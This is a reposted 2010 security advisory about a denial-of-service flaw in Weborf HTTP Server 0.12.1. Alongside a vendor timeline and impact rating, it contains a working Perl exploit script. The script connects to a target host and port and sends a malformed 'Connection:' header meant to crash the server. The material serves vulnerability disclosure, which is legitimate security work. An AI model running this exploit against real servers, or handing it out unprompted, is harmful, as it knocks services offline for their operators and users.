Home / os / win7

Weborf HTTP Server Denial of Service Vulnerability

Posted on 24 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Weborf HTTP Server Denial of Service Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================
Weborf HTTP Server Denial of Service Vulnerability
==================================================


[Software]
- Weborf HTTP Server
 
[Vendor Product Description]
- Weborf is a lightweight Web server written in C. It supports IPv6
and basic authentication. It doesn't implement the full HTTP
specification, but can be used to easily share directories or files.
 
[Bug Description]
- Weborf HTTP Server can't handle unicode characters in &quot;Connection: &quot;
general header-field leading to a Denial-of-Service flaw
 
[History]
- Advisory sent to vendor on 06/21/2010.
- Vendor reply 06/22/2010.
- Vendor patch published 06/23/2010
 
 
[Impact]
- Low
 
[Affected Version]
-Weborf 0.12.1
- Prior versions may also be vulnerable.
 
[Exploit]
 
#!/usr/bin/perl
use IO::Socket;
 
       if (@ARGV &lt; 1) {
               usage();
       }
 
       $ip     = $ARGV[0];
       $port   = $ARGV[1];
 
       print &quot;[+] Sending request...
&quot;;
 
       $socket = IO::Socket::INET-&gt;new( Proto =&gt; &quot;tcp&quot;, PeerAddr =&gt;
&quot;$ip&quot;, PeerPort =&gt; &quot;$port&quot;) || die &quot;[-] Connection FAILED!
&quot;;
       print $socket &quot;GET / HTTP/1.0
&quot;;
       print $socket &quot;Connection: &quot;. &quot;x99&quot; x 4 .&quot;

&quot;;
 
       close($socket);
 
       print &quot;[+] Done!
&quot;;
 
sub usage() {
       print &quot;[-] Usage: &lt;&quot;. $0 .&quot;&gt; &lt;host&gt; &lt;port&gt;
&quot;;
       print &quot;[-] Example: &quot;. $0 .&quot; 127.0.0.1 80
&quot;;
       exit;
}
---------------------------------------------------------------------------------
-------


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :